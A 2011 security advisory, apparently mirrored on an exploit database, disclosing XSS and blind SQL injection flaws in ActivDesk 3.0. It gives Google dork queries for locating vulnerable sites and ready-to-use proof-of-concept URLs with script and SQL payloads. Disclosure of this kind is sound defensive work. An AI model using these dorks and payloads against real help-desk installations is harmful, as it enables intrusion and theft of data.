ActivDesk 3.0 multiple security vulnerabilities # Date: 2011-06-24 # Author: Brendan Coles <bcoles@gmail.com> # Advisory: http://itsecuritysolutions.org/2011-06-24-ActivDesk-3.0-multiple-security-vulnerabilities/ # Software: ActivDesk # Version: <= 3.0 # Homepage: http://www.webhelpdesk-software.com/ # Google Dorks: # inurl:kbcat.cgi ext:cgi # "Help Desk Powered By ActivDesk" # Vendor: FocalMedia # Homepage: http://www.focalmedia.net/ # Notified: 2011-06-24 - Ticket# 67120010491 # Cross-Site Scripting (XSS): http://localhost/[PATH]/search.cgi?keywords0=<script>alert(0)</script> http://localhost/[PATH]/search.cgi?keywords1=<script>alert(1)</script> http://localhost/[PATH]/search.cgi?keywords2=<script>alert(2)</script> http://localhost/[PATH]/search.cgi?keywords3=<script>alert(3)</script> # Blind SQL Injection: http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''=' http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论